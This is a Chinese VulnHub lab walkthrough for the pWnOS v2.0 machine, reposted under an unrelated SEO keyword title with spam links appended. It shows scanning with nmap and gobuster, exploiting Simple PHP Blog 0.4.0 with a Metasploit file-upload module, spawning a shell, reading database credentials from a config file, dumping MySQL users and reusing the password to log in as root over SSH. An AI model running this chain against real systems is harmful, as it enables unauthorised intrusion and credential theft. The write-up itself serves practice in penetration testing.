当前位置: 首页 > news >正文

js写的网站怎么做seo福建seo搜索引擎优化

js写的网站怎么做seo,福建seo搜索引擎优化,网站的界面设计怎么做,排版设计说明知识点总结: 1.通过模块来寻找漏洞 2.msf查找漏洞 3.通过网站源代码,查看模块信息 环境准备 攻击机:kali2023 靶机:pWnOS v2.0 安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub 在安装网址中看到,该靶…

 知识点总结:

1.通过模块来寻找漏洞

2.msf查找漏洞

3.通过网站源代码,查看模块信息

环境准备

攻击机:kali2023

靶机:pWnOS v2.0

安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

在安装网址中看到,该靶机静态IP为10.10.10.100

所以我们就要修改虚拟机的"虚拟网络编辑器"

 其次靶机的虚拟机设置如下:

开始渗透!

信息收集

收集IP(虽然已经知道了)

arp-scan -l

 端口扫描

先大概看一下

nmap 10.10.10.100

再详细看一下

nmap -A -p- 10.10.10.100

看到内核版本等

访问一下80端口

扫一下目录

gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt

扫到了/blog目录,访问

查看源代码

查看到建立博客的模块模版是Simple PHP Blog 0.4.0

漏洞查找

msf查找有没有现成的漏洞

search Simple PHP Blog 0.4.0

存在,那我们直接利用

use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog      //填有该模块的url,此处写为uri
run                  //运行
shell                  //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")'  //优化命令行

提权

查看一下目录

存在文件:mysqli_connect.php,看看

拿到数据库root密码,登录

看看能不能拿到相关账户密码,分别执行下述命令爆库

show databases;
use mysql;
show tables;
select * from user;

最后看到

看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!

但是我们可以用上面的那个密码再登录一下ssh试试

ssh root@10.10.10.100

 成功root!

http://www.15wanjia.com/news/48427.html

相关文章:

  • 青岛北京网站建设自动推广引流app
  • 石家庄网站建设人员腾讯会议开始收费
  • 如何注册国外网站宁波seo哪家好
  • wordpress 禁用搜索怎么样做seo
  • php网页制作工具求职seo
  • 邮箱网站架构软广告经典例子
  • 国内大的做网站的公司seo咨询河北
  • 长春网站建设工作室百度seo排名推广
  • 上海商城网站建设成都seo公司
  • 凤岗网焦作网站seo
  • 做百度竞价网站搜索不到电商软文范例300字
  • 做网站安阳网络营销案例视频
  • 做网站具体收费知道百度
  • nginx 网站建设怎么设置自己的网站
  • 哪个网站做批发的东莞推广平台有哪些
  • 网站建设的功能有哪些外链兔
  • 怎么用本机做服务器发布网站点金推广优化公司
  • 多语言 网站源码上海网站seo诊断
  • 做公司 网站建设价格低热门推广平台
  • 软件开发和网站开发营销网址
  • 网站建设项目运作的可行性seo超级外链工具免费
  • 网站空间分类注册网站域名
  • 做网站 嵌入支付免费站推广网站在线
  • 家具公司网站模板下载天津百度关键词排名
  • 哪家公司做网站开发做得比较好关键词优化工具互点
  • 台州做网站优化哪家好今日头条热榜
  • 做网站可以不用框架吗百度统计代码
  • 郑州网站建设公司咨询赣州seo培训
  • 网络设计案例题无锡seo公司找哪家好
  • 网站建设中最重要的环节是百度链接地址